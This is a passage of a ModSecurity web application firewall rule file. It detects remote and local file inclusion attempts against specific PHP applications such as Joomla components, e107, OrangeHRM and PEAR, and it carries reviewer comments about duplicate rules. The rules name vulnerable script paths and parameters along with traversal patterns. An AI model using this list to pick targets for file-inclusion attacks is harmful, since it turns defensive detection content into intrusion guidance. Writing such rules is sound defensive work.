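    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:CURRENT_BLOG_PATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ardeaCore PHP Framework CURRENT_BLOG_PATH Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012604) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ardeaCore PHP Framework appMVCPath Parameter Remote File Inclusion Attempt
# NOTE(review): same path, method and TX pattern as 2012583; only id and rev
# differ. With both loaded, one matching request adds the critical score
# twice - confirm whether both ids are meant to stay enabled.
SecRule REQUEST_LINE "@contains /ardeaCore/lib/core/mvc/ardeaMVC.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012604,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ardeaCore PHP Framework appMVCPath Parameter Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:appMVCPath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ardeaCore PHP Framework appMVCPath Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012605) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ardeaCore PHP Framework CURRENT_BLOG_PATH Parameter Remote File Inclusion Attempt
# NOTE(review): same path, method and TX pattern as 2012584; only id and rev
# differ. With both loaded, one matching request adds the critical score
# twice - confirm whether both ids are meant to stay enabled.
SecRule REQUEST_LINE "@contains /ardeaCore/lib/core/ardeaBlog.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012605,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS ardeaCore PHP Framework CURRENT_BLOG_PATH Parameter Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:CURRENT_BLOG_PATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ardeaCore PHP Framework CURRENT_BLOG_PATH Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012657) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS eyeOS file Parameter Local File Inclusion Attempt
# Both argument links inspect ARGS:sleep: its value must contain "file=" and
# also match the "../" regex.
# NOTE(review): the message names the file parameter while the links test the
# value of sleep - confirm against the upstream signature.
SecRule REQUEST_LINE "@contains /devtools/qooxdoo-sdk/framework/source/resource/qx/test/part/delay.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012657,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS eyeOS file Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:sleep "@contains file=" "chain"
    SecRule ARGS:sleep "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS eyeOS file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_doqment Remote File inclusion Attempt
# This chain has one extra link: the request line must also contain
# option=com_doqment.
# NOTE(review): the message names com_doqment while the path link matches
# admin.ponygallery.html.php - confirm the file name against the upstream
# signature.
SecRule REQUEST_LINE "@contains admin.ponygallery.html.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012659,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_doqment Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains option=com_doqment" "chain"
    SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_doqment Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012666) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla component smartformer Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /components/com_smartformer/smartformer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012666,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla component smartformer Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla component smartformer Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012668) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LoCal Calendar System LIBDIR Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /lib/lcUser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012668,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS LoCal Calendar System LIBDIR Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:LIBDIR "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LoCal Calendar System LIBDIR Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012703) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_latestprod module Remote File inclusion Attempt
SecRule REQUEST_LINE "@contains /modules/mod_virtuemart_latestprod/mod_virtuemart_latestprod.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012703,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_latestprod module Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_latestprod module Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012704) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_featureprod module Remote File inclusion Attempt
SecRule REQUEST_LINE "@contains /modules/mod_virtuemart_featureprod/mod_virtuemart_featureprod.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012704,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_featureprod module Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla mod_virtuemart_featureprod module Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012705) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /wp-content/plugins/wp-publication-archive/includes/openfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012705,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress WP Publication file Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012721) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS LightNEasy File Manager language Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /plugins/filemanager/get_file.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012721,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS LightNEasy File Manager language Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:language "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS LightNEasy File Manager language Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012724) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CitusCMS filePath Parameter Remote File inclusion Attempt
SecRule REQUEST_LINE "@contains /include/classes/file.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012724,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS CitusCMS filePath Parameter Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:filePath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CitusCMS filePath Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012743) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SaurusCMS captcha_image.php script Remote File inclusion Attempt
SecRule REQUEST_LINE "@contains /extensions/saurus4/captcha_image.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012743,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS SaurusCMS captcha_image.php script Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:class_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SaurusCMS captcha_image.php script Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012750) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OrangeHRM path Parameter Local File Inclusion Attempt
# Same regex form as 2012571: no operator is named on the last link.
SecRule REQUEST_LINE "@contains /plugins/PluginController.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012750,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS OrangeHRM path Parameter Local File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:path "(?i:\.\.\\x2f)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OrangeHRM path Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012794) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClanSphere CurrentFolder Parameter Local File Inclusion Attempt
SecRule REQUEST_LINE "@contains /mods/ckeditor/filemanager/connectors/php/connector.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012794,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS ClanSphere CurrentFolder Parameter Local File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,47636'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:CurrentFolder "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClanSphere CurrentFolder Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012795) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Golem Gaming Portal root_path Parameter Remote File inclusion Attempt
SecRule REQUEST_LINE "@contains /admin/admin_news_bot.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012795,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Golem Gaming Portal root_path Parameter Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:root_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Golem Gaming Portal root_path Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012837) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_mgm Remote File inclusion Attempt
SecRule REQUEST_LINE "@contains /components/com_mgm/help.mgm.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012837,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_mgm Remote File inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:mosConfig_absolute_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_mgm Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2012877) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e107 HANDLERS_DIRECTORY Parameter Remote File inclusion Attempt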
SecRule REQUEST_LINE "@contains /e107_handlers/secure_img_handler.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012877,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS e107 HANDLERS_DIRECTORY Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:HANDLERS_DIRECTORY/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e107 HANDLERS_DIRECTORY Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012878) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e107 IMAGES_DIRECTORY Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /e107_handlers/secure_img_handler.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012878,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS e107 IMAGES_DIRECTORY Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:IMAGES_DIRECTORY/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e107 IMAGES_DIRECTORY Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012879) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e107 imgp Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /e107_handlers/secure_img_handler.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012879,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS e107 imgp Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule 
&TX:'/RFI.*ARGS:imgp/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e107 imgp Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012880) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e107 trackback_url Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /e107_plugins/trackback/trackbackClass.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012880,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS e107 trackback_url Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:trackback_url/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e107 trackback_url Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012881) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS e107 permLink Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /e107_plugins/trackback/trackbackClass.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012881,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS e107 permLink Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:permLink/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS e107 permLink Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012945) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS nvisionix Roaming System sessions.php script Local File Inclusion 
Attempt SecRule REQUEST_LINE "@contains /authenticate/sessions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012945,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS nvisionix Roaming System sessions.php script Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:globalIncludeFilePath "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS nvisionix Roaming System sessions.php script Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012948) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012948,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jmsfileseller" "chain" SecRule ARGS:view "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Component com_jmsfileseller view Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012949) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Opencadastre soustab.php script Local File Inclusion Vulnerability SecRule REQUEST_LINE "@contains /scr/soustab.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012949,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Opencadastre soustab.php script Local File Inclusion 
Vulnerability',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:dsn[phptype] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Opencadastre soustab.php script Local File Inclusion Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012950) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openscrutin droit.class.php path_om Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains droit.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012950,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Openscrutin droit.class.php path_om Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openscrutin droit.class.php path_om Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012951) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openscrutin collectivite.class.php path_om Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /collectivite.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012951,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Openscrutin collectivite.class.php path_om Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openscrutin collectivite.class.php path_om Parameter Remote File inclusion 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012952) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openscrutin utilisateur.class.php path_om Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /utilisateur.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012952,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Openscrutin utilisateur.class.php path_om Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openscrutin utilisateur.class.php path_om Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012953) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openscrutin courrier.class.php path_om Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /courrier.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012953,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Openscrutin courrier.class.php path_om Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openscrutin courrier.class.php path_om Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012954) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Openscrutin profil.class.php path_om Remote File inclusion Attempt SecRule REQUEST_LINE "@contains 
/profil.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012954,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Openscrutin profil.class.php path_om Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:path_om/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Openscrutin profil.class.php path_om Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012993) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PEAR include_path Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /pear.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012993,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS PEAR include_path Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:include_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PEAR include_path Parameter Remote File inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2012994) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PEAR_PHPDIR Parameter Remote File inclusion Attempt SecRule REQUEST_LINE "@contains /pear.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012994,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS PEAR_PHPDIR Parameter Remote File inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:_PEAR_PHPDIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PEAR_PHPDIR Parameter Remote File 
